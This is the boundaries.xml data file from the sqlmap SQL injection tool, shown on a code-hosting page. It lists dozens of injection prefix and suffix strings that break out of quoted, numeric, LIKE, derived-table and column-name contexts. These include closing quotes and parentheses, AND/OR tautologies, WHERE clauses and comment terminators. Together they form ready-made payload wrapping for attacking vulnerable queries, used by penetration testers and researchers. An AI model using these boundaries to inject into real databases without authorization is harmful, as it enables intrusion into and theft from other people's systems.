CoCalc -- boundaries.xml

GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/data/xml/boundaries.xml
²⁹⁸⁹ views
1
<?xml version="1.0" encoding="UTF-8"?>
2

3
<!--
4
Tag: <boundary>
5
    How to prepend and append to the test ' <payload><comment> ' string.
6

7
    Sub-tag: <level>
8
        From which level check for this test.
9

10
        Valid values:
11
            1: Always (<100 requests)
12
            2: Try a bit harder (100-200 requests)
13
            3: Good number of requests (200-500 requests)
14
            4: Extensive test (500-1000 requests)
15
            5: You have plenty of time (>1000 requests)
16

17
    Sub-tag: <clause>
18
        In which clause the payload can work.
19

20
        NOTE: for instance, there are some payload that do not have to be
21
        tested as soon as it has been identified whether or not the
22
        injection is within a WHERE clause condition.
23

24
        Valid values:
25
            0: Always
26
            1: WHERE / HAVING
27
            2: GROUP BY
28
            3: ORDER BY
29
            4: LIMIT
30
            5: OFFSET
31
            6: TOP
32
            7: Table name
33
            8: Column name
34
            9: Pre-WHERE (non-query)
35

36
        A comma separated list of these values is also possible.
37

38
    Sub-tag: <where>
39
        Where to add our '<prefix> <payload><comment> <suffix>' string.
40

41
        Valid values:
42
            1: When the value of <test>'s <where> is 1.
43
            2: When the value of <test>'s <where> is 2.
44
            3: When the value of <test>'s <where> is 3.
45

46
        A comma separated list of these values is also possible.
47

48
    Sub-tag: <ptype>
49
        What is the parameter value type.
50

51
        Valid values:
52
            1: Unescaped numeric
53
            2: Single quoted string
54
            3: LIKE single quoted string
55
            4: Double quoted string
56
            5: LIKE double quoted string
57
            6: Identifier (e.g. column name)
58

59
    Sub-tag: <prefix>
60
        A string to prepend to the payload.
61

62
    Sub-tag: <suffix>
63
        A string to append to the payload.
64

65
Formats:
66
    <boundary>
67
        <level></level>
68
        <clause></clause>
69
        <where></where>
70
        <ptype></ptype>
71
        <prefix></prefix>
72
        <suffix></suffix>
73
    </boundary>
74

75
-->
76

77
<root>
78
    <!-- Generic boundaries -->
79
    <boundary>
80
        <level>3</level>
81
        <clause>1</clause>
82
        <where>1,2</where>
83
        <ptype>1</ptype>
84
        <prefix>)</prefix>
85
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
86
    </boundary>
87

88
    <boundary>
89
        <level>4</level>
90
        <clause>1</clause>
91
        <where>1,2</where>
92
        <ptype>2</ptype>
93
        <prefix>')</prefix>
94
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
95
    </boundary>
96

97
    <boundary>
98
        <level>3</level>
99
        <clause>1,2,3</clause>
100
        <where>1,2</where>
101
        <ptype>2</ptype>
102
        <prefix>'</prefix>
103
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
104
    </boundary>
105

106
    <boundary>
107
        <level>5</level>
108
        <clause>1</clause>
109
        <where>1,2</where>
110
        <ptype>4</ptype>
111
        <prefix>"</prefix>
112
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
113
    </boundary>
114
    <!-- End of generic boundaries -->
115

116
    <!-- WHERE/HAVING clause boundaries -->
117
    <boundary>
118
        <level>1</level>
119
        <clause>1</clause>
120
        <where>1,2</where>
121
        <ptype>1</ptype>
122
        <prefix>)</prefix>
123
        <suffix> AND ([RANDNUM]=[RANDNUM]</suffix>
124
    </boundary>
125

126
    <boundary>
127
        <level>2</level>
128
        <clause>1</clause>
129
        <where>1,2</where>
130
        <ptype>1</ptype>
131
        <prefix>))</prefix>
132
        <suffix> AND (([RANDNUM]=[RANDNUM]</suffix>
133
    </boundary>
134

135
    <boundary>
136
        <level>3</level>
137
        <clause>1</clause>
138
        <where>1,2</where>
139
        <ptype>1</ptype>
140
        <prefix>)))</prefix>
141
        <suffix> AND ((([RANDNUM]=[RANDNUM]</suffix>
142
    </boundary>
143

144
    <boundary>
145
        <level>1</level>
146
        <clause>0</clause>
147
        <where>1,2,3</where>
148
        <ptype>1</ptype>
149
        <prefix></prefix>
150
        <suffix></suffix>
151
    </boundary>
152

153
    <boundary>
154
        <level>1</level>
155
        <clause>1</clause>
156
        <where>1,2</where>
157
        <ptype>2</ptype>
158
        <prefix>')</prefix>
159
        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
160
    </boundary>
161

162
    <boundary>
163
        <level>2</level>
164
        <clause>1</clause>
165
        <where>1,2</where>
166
        <ptype>2</ptype>
167
        <prefix>'))</prefix>
168
        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
169
    </boundary>
170

171
    <boundary>
172
        <level>3</level>
173
        <clause>1</clause>
174
        <where>1,2</where>
175
        <ptype>2</ptype>
176
        <prefix>')))</prefix>
177
        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
178
    </boundary>
179

180
    <boundary>
181
        <level>1</level>
182
        <clause>1</clause>
183
        <where>1,2</where>
184
        <ptype>2</ptype>
185
        <prefix>'</prefix>
186
        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
187
    </boundary>
188

189
    <boundary>
190
        <level>2</level>
191
        <clause>1</clause>
192
        <where>1,2</where>
193
        <ptype>3</ptype>
194
        <prefix>')</prefix>
195
        <suffix> AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
196
    </boundary>
197

198
    <boundary>
199
        <level>3</level>
200
        <clause>1</clause>
201
        <where>1,2</where>
202
        <ptype>3</ptype>
203
        <prefix>'))</prefix>
204
        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
205
    </boundary>
206

207
    <boundary>
208
        <level>4</level>
209
        <clause>1</clause>
210
        <where>1,2</where>
211
        <ptype>3</ptype>
212
        <prefix>')))</prefix>
213
        <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
214
    </boundary>
215

216
    <boundary>
217
        <level>2</level>
218
        <clause>1</clause>
219
        <where>1,2</where>
220
        <ptype>3</ptype>
221
        <prefix>%'</prefix>
222
        <suffix> AND '[RANDSTR]%'='[RANDSTR]</suffix>
223
    </boundary>
224

225
    <boundary>
226
        <level>2</level>
227
        <clause>1</clause>
228
        <where>1,2</where>
229
        <ptype>3</ptype>
230
        <prefix>'</prefix>
231
        <suffix> AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
232
    </boundary>
233

234
    <boundary>
235
        <level>2</level>
236
        <clause>1</clause>
237
        <where>1,2</where>
238
        <ptype>4</ptype>
239
        <prefix>")</prefix>
240
        <suffix> AND ("[RANDSTR]"="[RANDSTR]</suffix>
241
    </boundary>
242

243
    <boundary>
244
        <level>3</level>
245
        <clause>1</clause>
246
        <where>1,2</where>
247
        <ptype>4</ptype>
248
        <prefix>"))</prefix>
249
        <suffix> AND (("[RANDSTR]"="[RANDSTR]</suffix>
250
    </boundary>
251

252
    <boundary>
253
        <level>4</level>
254
        <clause>1</clause>
255
        <where>1,2</where>
256
        <ptype>4</ptype>
257
        <prefix>")))</prefix>
258
        <suffix> AND ((("[RANDSTR]"="[RANDSTR]</suffix>
259
    </boundary>
260

261
    <boundary>
262
        <level>2</level>
263
        <clause>1</clause>
264
        <where>1,2</where>
265
        <ptype>4</ptype>
266
        <prefix>"</prefix>
267
        <suffix> AND "[RANDSTR]"="[RANDSTR]</suffix>
268
    </boundary>
269

270
    <boundary>
271
        <level>3</level>
272
        <clause>1</clause>
273
        <where>1,2</where>
274
        <ptype>5</ptype>
275
        <prefix>")</prefix>
276
        <suffix> AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
277
    </boundary>
278

279
    <boundary>
280
        <level>4</level>
281
        <clause>1</clause>
282
        <where>1,2</where>
283
        <ptype>5</ptype>
284
        <prefix>"))</prefix>
285
        <suffix> AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
286
    </boundary>
287

288
    <boundary>
289
        <level>5</level>
290
        <clause>1</clause>
291
        <where>1,2</where>
292
        <ptype>5</ptype>
293
        <prefix>")))</prefix>
294
        <suffix> AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
295
    </boundary>
296

297
    <boundary>
298
        <level>3</level>
299
        <clause>1</clause>
300
        <where>1,2</where>
301
        <ptype>5</ptype>
302
        <prefix>"</prefix>
303
        <suffix> AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
304
    </boundary>
305

306
    <boundary>
307
        <level>1</level>
308
        <clause>1</clause>
309
        <where>1,2</where>
310
        <ptype>1</ptype>
311
        <prefix></prefix>
312
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
313
    </boundary>
314

315
    <boundary>
316
        <level>3</level>
317
        <clause>1</clause>
318
        <where>1,2</where>
319
        <ptype>1</ptype>
320
        <prefix></prefix>
321
        <suffix># [RANDSTR]</suffix>
322
    </boundary>
323

324
    <!--     e.g. admin' AND [INFERENCE] OR 'foo'='bar' AND password=$password -->
325
    <boundary>
326
        <level>3</level>
327
        <clause>1</clause>
328
        <where>1,2</where>
329
        <ptype>2</ptype>
330
        <prefix>'</prefix>
331
        <suffix> OR '[RANDSTR1]'='[RANDSTR2]</suffix>
332
    </boundary>
333
    <!-- End of WHERE/HAVING clause boundaries -->
334

335
    <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
336
    <boundary>
337
        <level>5</level>
338
        <clause>9</clause>
339
        <where>1,2</where>
340
        <ptype>2</ptype>
341
        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
342
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
343
    </boundary>
344

345
    <boundary>
346
        <level>5</level>
347
        <clause>9</clause>
348
        <where>1,2</where>
349
        <ptype>2</ptype>
350
        <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
351
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
352
    </boundary>
353

354
    <boundary>
355
        <level>4</level>
356
        <clause>9</clause>
357
        <where>1,2</where>
358
        <ptype>1</ptype>
359
        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
360
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
361
    </boundary>
362

363
    <boundary>
364
        <level>4</level>
365
        <clause>9</clause>
366
        <where>1,2</where>
367
        <ptype>2</ptype>
368
        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
369
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
370
    </boundary>
371

372
    <boundary>
373
        <level>5</level>
374
        <clause>9</clause>
375
        <where>1,2</where>
376
        <ptype>4</ptype>
377
        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
378
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
379
    </boundary>
380

381
    <boundary>
382
        <level>4</level>
383
        <clause>9</clause>
384
        <where>1,2</where>
385
        <ptype>1</ptype>
386
        <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
387
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
388
    </boundary>
389

390
    <boundary>
391
        <level>5</level>
392
        <clause>9</clause>
393
        <where>1</where>
394
        <ptype>2</ptype>
395
        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
396
        <suffix>)||'</suffix>
397
    </boundary>
398

399
    <boundary>
400
        <level>5</level>
401
        <clause>9</clause>
402
        <where>1</where>
403
        <ptype>2</ptype>
404
        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
405
        <suffix>)||'</suffix>
406
    </boundary>
407

408
    <boundary>
409
        <level>5</level>
410
        <clause>9</clause>
411
        <where>1</where>
412
        <ptype>2</ptype>
413
        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
414
        <suffix>)+'</suffix>
415
    </boundary>
416

417
    <boundary>
418
        <level>5</level>
419
        <clause>9</clause>
420
        <where>1</where>
421
        <ptype>2</ptype>
422
        <prefix>||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
423
        <suffix>)||</suffix>
424
    </boundary>
425

426
    <boundary>
427
        <level>5</level>
428
        <clause>9</clause>
429
        <where>1</where>
430
        <ptype>2</ptype>
431
        <prefix>||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
432
        <suffix>)||</suffix>
433
    </boundary>
434

435
    <boundary>
436
        <level>5</level>
437
        <clause>9</clause>
438
        <where>1</where>
439
        <ptype>1</ptype>
440
        <prefix>+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
441
        <suffix>)+</suffix>
442
    </boundary>
443

444
    <boundary>
445
        <level>5</level>
446
        <clause>9</clause>
447
        <where>1</where>
448
        <ptype>2</ptype>
449
        <prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
450
        <suffix>)+</suffix>
451
    </boundary>
452
    <!-- End of pre-WHERE generic boundaries -->
453

454
    <!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
455
    <boundary>
456
        <level>5</level>
457
        <clause>1</clause>
458
        <where>1,2</where>
459
        <ptype>2</ptype>
460
        <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
461
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
462
    </boundary>
463

464
    <boundary>
465
        <level>5</level>
466
        <clause>1</clause>
467
        <where>1,2</where>
468
        <ptype>2</ptype>
469
        <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
470
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
471
    </boundary>
472

473
    <boundary>
474
        <level>5</level>
475
        <clause>1</clause>
476
        <where>1,2</where>
477
        <ptype>1</ptype>
478
        <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
479
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
480
    </boundary>
481

482
    <boundary>
483
        <level>4</level>
484
        <clause>1</clause>
485
        <where>1,2</where>
486
        <ptype>2</ptype>
487
        <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
488
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
489
    </boundary>
490

491
    <boundary>
492
        <level>5</level>
493
        <clause>1</clause>
494
        <where>1,2</where>
495
        <ptype>4</ptype>
496
        <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
497
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
498
    </boundary>
499

500
    <boundary>
501
        <level>4</level>
502
        <clause>1</clause>
503
        <where>1,2</where>
504
        <ptype>1</ptype>
505
        <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
506
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
507
    </boundary>
508

509
    <boundary>
510
        <level>4</level>
511
        <clause>1</clause>
512
        <where>1</where>
513
        <ptype>1</ptype>
514
        <prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>
515
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
516
    </boundary>
517

518
    <boundary>
519
        <level>5</level>
520
        <clause>1</clause>
521
        <where>1</where>
522
        <ptype>1</ptype>
523
        <prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>
524
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
525
    </boundary>
526
    <!-- End of pre-WHERE derived table boundaries -->
527

528
    <!-- Escaped column name (e.g. SELECT `...` FROM table) boundaries -->
529
    <boundary>
530
        <level>4</level>
531
        <clause>8</clause>
532
        <where>1</where>
533
        <ptype>6</ptype>
534
        <prefix>`=`[ORIGINAL]`</prefix>
535
        <suffix> AND `[ORIGINAL]`=`[ORIGINAL]</suffix>
536
    </boundary>
537

538
    <boundary>
539
        <level>5</level>
540
        <clause>8</clause>
541
        <where>1</where>
542
        <ptype>6</ptype>
543
        <prefix>"="[ORIGINAL]"</prefix>
544
        <suffix> AND "[ORIGINAL]"="[ORIGINAL]</suffix>
545
    </boundary>
546

547
    <boundary>
548
        <level>5</level>
549
        <clause>8</clause>
550
        <where>1</where>
551
        <ptype>6</ptype>
552
        <prefix>]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]</prefix>
553
        <suffix>)|[[ORIGINAL]</suffix>
554
    </boundary>
555
    <!-- End of escaped column name boundaries -->
556

557
    <boundary>
558
        <level>5</level>
559
        <clause>7</clause>
560
        <where>1</where>
561
        <ptype>3</ptype>
562
        <prefix> [RANDSTR1],</prefix>
563
        <suffix> [RANDSTR2]</suffix>
564
    </boundary>
565

566
    <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
567
    <boundary>
568
        <level>4</level>
569
        <clause>1</clause>
570
        <where>1</where>
571
        <ptype>2</ptype>
572
        <prefix>' IN BOOLEAN MODE)</prefix>
573
        <suffix>#</suffix>
574
    </boundary>
575
    <!-- End of AGAINST boolean full-text search boundaries -->
576
</root>
577

578
Product

Resources

Company
